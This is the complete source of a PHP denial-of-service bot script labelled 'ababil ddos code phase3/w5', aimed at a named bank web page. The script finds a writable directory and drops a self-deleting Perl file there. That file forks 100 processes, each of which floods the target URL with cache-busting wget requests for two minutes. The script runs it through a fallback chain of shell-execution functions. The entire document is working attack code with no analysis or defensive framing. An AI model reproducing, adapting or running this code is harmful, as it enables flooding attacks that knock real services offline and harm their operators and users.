ababil ddos code phase3/w5

1. <?php
2. function randomvar(){
3.         $a=chr(rand(97,122));
4.         $b=rtrim(base64_encode(rand(100,10000)),'=');
5.         return $a.$b;
6. }
7. $url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
8. $rand = md5(microtime().rand(0,500));
9. if(preg_match("/\?/",$url))
10.         $url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
11. else
12.         $url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
13. if(!function_exists('scandir'))
14.   {
15.     function scandir($a,$b=false,$c=true)
16.       {
17.         $d=array();
18.         if($e=opendir($a))
19.           {
20.             while(false!==($f=readdir($e)))
21.               {
22.                 if(($f!="."&&$f!="..")||$c==true)
23.                   {
24.                     if($b==false)
25.                       if(is_dir($f))
26.                         continue;
27.                     array_push($d,basename($f));
28.                   }
29.               }
30.             closedir($e);
31.           }
32.         return $d;
33.       }
34.   }
35.  
36. function on_exit()
37.   {
38.     echo "###Assassin###\n";
39.     echo "\nuau-repeat";
40.   }
41.  
42. if(function_exists('register_shutdown_function'))
43.    register_shutdown_function("on_exit");
44.  
45. fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
46. "unlink '$h';
47. $time=time();
48. for($i = 0;$i < 100;$i++)
49.  {
50.    if(fork())
51.      {
52.      }
53.    else
54.      {
55.        $j=0;while(time()-$time<120)
56.          {
57.            $j++;
58.            if($j % 100 == 0)
59.              {
60.                sleep 1;
61.              }
62.            system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
63.          }
64.        last;
65.      }
66.    }"
67.   ); # fwrite Ends
68.  
69. iyiuo("perl $h");
70. echo "###Assassin###";
71. echo "\nuau-repeat";
72.  
73. function iyiuo($r)
74.   {
75.      $s="";
76.      if(!empty($r))
77.        {
78.                 if(function_exists('exec'))
79.                   {
80.                         @exec($r,$s);
81.                         $s=join("\n",$s);
82.                   }
83.                 elseif(function_exists('shell_exec'))
84.                         $s=@shell_exec($r);
85.                 elseif(function_exists('system'))
86.                   {
87.                         @ob_start();
88.                         @system($r);
89.                         $s=@ob_get_contents();
90.                         @ob_end_clean();
91.                   }
92.                elseif(function_exists('passthru'))
93.                  {
94.                         @ob_start();
95.                         @passthru($r);
96.                         $s=@ob_get_contents();
97.                         @ob_end_clean();
98.                   }
99.                elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
100.                  {
101.                         $s="";
102.                         while(!@feof($t))
103.                                 $s.=@fread($t,1024);
104.                         @pclose($t);
105.                  }
106.                elseif(function_exists('proc_open'))
107.                  {
108.                         $u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
109.                         $s=stream_get_contents($v[1]);
110.                         fclose($v[0]);
111.                         fclose($v[1]);
112.                         fclose($v[2]);
113.                         proc_close($u);
114.                  }
115.        }
116.    return $s;
117.   }
118.  
119. function gyhuijoakosdoj()
120.   {
121.     $j="";
122.     if(!isset($_SERVER["DOCUMENT_ROOT"]))
123.       $_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
124.       $k[]=$_SERVER["DOCUMENT_ROOT"];
125.       while($k)
126.         {
127.           $l=array_pop($k);
128.           if($m=scandir($l))
129.             {
130.               $n=0;
131.               while(isset($m[$n]))
132.                 {
133.                   if($m[$n]!=="."&&$m[$n]!=="..")
134.                     {
135.                       $o="{$l}/{$m[$n]}";
136.                       if(is_dir($o))
137.                         {
138.                           $k[]=$o;
139.                           if(@is_writable($o))
140.                             {
141.                               return $o;
142.                             }
143.                         }
144.                     }
145.                   $n++;
146.                 }
147.             }
148.         }
149.       return false;
150.   }
151.  
152. function tgya8siudj()
153.   {
154.     if(@is_writable('/tmp'))
155.       return '/tmp';
156.     elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
157.       return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
158.     elseif(!function_exists("sys_gt_temp_dir"))
159.       {
160.         if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
161.           return realpath($_ENV["TMP"]);
162.         elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
163.           return realpath($_ENV["TMPDIR"]);
164.         elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
165.           return realpath($_ENV["TEMP"]);
166.         else
167.           {
168.             $a=gyhuijoakosdoj();
169.             if($a==!false)
170.               return $a;
171.             $p=tempnam(md5(uniqid(rand(),TRUE)),"");
172.             if($p)
173.               {
174.                 $q=realpath(dirname($p));
175.                 @unlink($p);
176.                 return $q;
177.               }
178.             else
179.                return false;
180.           }
181.       }
182.     else
183.        return sys_get_temp_dir();
184.   }
185. exit;